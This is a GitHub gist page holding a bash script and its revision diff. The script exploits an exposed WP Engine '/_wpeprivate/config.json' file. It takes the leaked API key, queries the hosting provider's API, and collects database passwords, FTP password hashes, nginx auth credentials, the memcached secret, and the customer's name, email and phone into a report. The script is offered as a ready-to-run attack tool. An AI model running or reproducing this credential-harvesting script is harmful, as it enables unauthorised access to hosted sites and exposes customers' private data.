Last active
October 9, 2025 12:41
-
-
Save hateshape/2e671ea71d7c243fac7ebf51fb738f0a to your computer and use it in GitHub Desktop.
Revisions
-
hateshape revised this gist
May 5, 2019 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -44,7 +44,7 @@ echo -e ${BLUE}"Nginx Auth - "${GREEN} >> $ACCOUNTNAME-report.txt jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json | grep -E '(user)|(password)' | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt grep -E '(gopher_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt -
Jan 22, 2019 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,59 @@ #!/bin/bash # If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies. # If it "no worked" (Technical Term) then you probably need to install jq! TARGET=$1 TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3) # Pretty Colors RESET='\033[00m' GREEN='\033[01;32m' BLUE='\033[01;34m' echo -e ${BLUE}"------------------------ Downloading '_wpeprivate/config.json' -------------------------"${RESET} echo -e ${GREEN}"curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json"${RESET} curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json WPEAPIKEY=$(jq '.' $TARGETDOMAIN-config.json | grep wpengine_apikey | awk '{print $2}' | cut -d, -f1 | sed 's/"//g') ACCOUNTNAME=$(jq '.' $TARGETDOMAIN-config.json | grep WPENGINE_ACCOUNT | awk '{print $2}' | cut -d, -f1 | sed 's/"//g' | sort -u) echo -e ${BLUE}"\n-------------------------- Make 1st API Call to api.wpengine.com -----------------------"${RESET} echo -e ${GREEN}"curl -so $ACCOUNTNAME-site.json -k https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET} curl -so $ACCOUNTNAME-site.json -k "https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY" echo -e ${BLUE}"\n-------------------------- Make 2nd API Call to api.wpengine.com -----------------------"${RESET} echo -e ${GREEN}"curl -so $ACCOUNTNAME-customer.json -k https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET} curl -so $ACCOUNTNAME-customer.json -k "https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY" echo -e ${BLUE}"\n----------------------------- Report - $(echo $TARGETDOMAIN) - $(echo $ACCOUNTNAME) -----------------------------"${RESET} echo -e ${BLUE}"Configuration Info - "${GREEN} >> $ACCOUNTNAME-report.txt grep -E '(site)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt grep -E '(server_name)|(wp_version)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nDomains - "${GREEN} >> $ACCOUNTNAME-report.txt jq -r '.all_domains' $ACCOUNTNAME-site.json | sed ':a;N;$!ba;s/\n//g' | sed 's|[{}"[]||g' | sed 's/ //g' | cut -d] -f1 >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nDatabase Infos - "${GREEN} >> $ACCOUNTNAME-report.txt echo "db_password:"$(jq -r '.db_password' $ACCOUNTNAME-site.json) >> $ACCOUNTNAME-report.txt echo -e "db_password_encryption" >> $ACCOUNTNAME-report.txt jq -r '.db_password_encryption' $ACCOUNTNAME-site.json | sed -e $'s/,/\\\n/g' | sed 's|[{}",]||g' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nFTP Users and Password Hashes - "${GREEN} >> $ACCOUNTNAME-report.txt jq '.ftp_users | to_entries[]' $ACCOUNTNAME-site.json | sed 's|[{},]||g' | awk '{print $1 $2}' | sed 's/"//g' | grep -vE '(value:)|(^$)' | sed 's/path:/&\n/g' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"Nginx Auth - "${GREEN} >> $ACCOUNTNAME-report.txt jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json | grep -E '(user)|(password)' | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt grep -E '(gophpr_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo "account_id:"$(jq -r '.account_id' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo "account_type:"$(jq -r '.account_type' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo "full_name:"$(jq -r '.full_name' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo "email:"$(jq -r '.email' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo "phone:"$(jq -r '.phone' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo -e ${GREEN} cat $ACCOUNTNAME-report.txt echo -e ${BLUE}"----------------------------------------------------------------------------------------"${RESET}